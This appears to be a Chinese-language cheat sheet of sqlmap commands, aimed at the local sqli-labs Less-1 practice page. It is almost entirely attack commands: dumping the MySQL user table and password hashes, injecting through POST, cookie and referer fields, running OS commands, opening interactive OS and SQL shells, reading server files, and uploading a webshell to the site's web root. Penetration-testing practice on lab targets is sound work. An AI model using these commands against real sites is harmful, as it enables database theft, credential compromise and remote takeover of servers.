判断是否存在注入
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1”
判断当前用户下所有数据库
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” –dbs
获取数据库的表名
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” -D mysql –tables
获取表中的字段名
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” -D mysql -T user –dump
获取表中字段内容
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” -D mysql -T user -C user,password –dump
列出所有管理员用户
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” –users
获取数据库用户的密码
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” –passwords
获取当前网站数据库名称
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” –current-db
获取当前数据库的用户名称
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” –current-user
当前用户是否为管理员权限
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” –is-dba
判断文本中的请求是否存在注入
sqlmap.py -r request.txt –level 3
request文件中保存的是web数据包,Http请求。
指定页面的POST字段注入
sqlmap.py -u URL –data “uname=123&passwd=123&submit=Submit”
cookie值注入
sqlmap.py -u URL –cookie=”cookie值”
检测request.txt中cookie字段进行注入
qlmap.py -r request.txt –level 2
referfer值注入
sqlmap.py -u URL –referer=“referer值”
1.sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –is-dba
//判断目标数据库用户是否是管理员TRUE/FALSE
- sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –users
//查看数据库用户
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –os-cmd=”whoami”
//在DBA前提下,执行单条命令
3.sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –os-shell
//在DBA前提下,获取交互式的shell
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –sql-shell
//返回SQL的交互式shell
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –file-read=”D:\phpStudy\PHPTutorial\WWW\sqlilabs\Less-1\index2.php”
//读取下载目标站点的指定文件
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –file-write 本地一句话木马绝对路径 –file-dest 网站一句话木马绝对路径+名称.PHP //上传木马到目标网站绝对路径
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –roles
//查看 sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –threads 1 //设置线程数,默认为1
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1&newid=2” –skip=”newid” //跳过参数检测
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1&newid=2” –prefix “) –suffix # //
指定PAYLOAD的闭合和注释方式
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1&newid=2” –banner //查询数据库的版本信息
sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php?id=1” –technique T
//缩写:BEUSTQ
评论前必须登录!
注册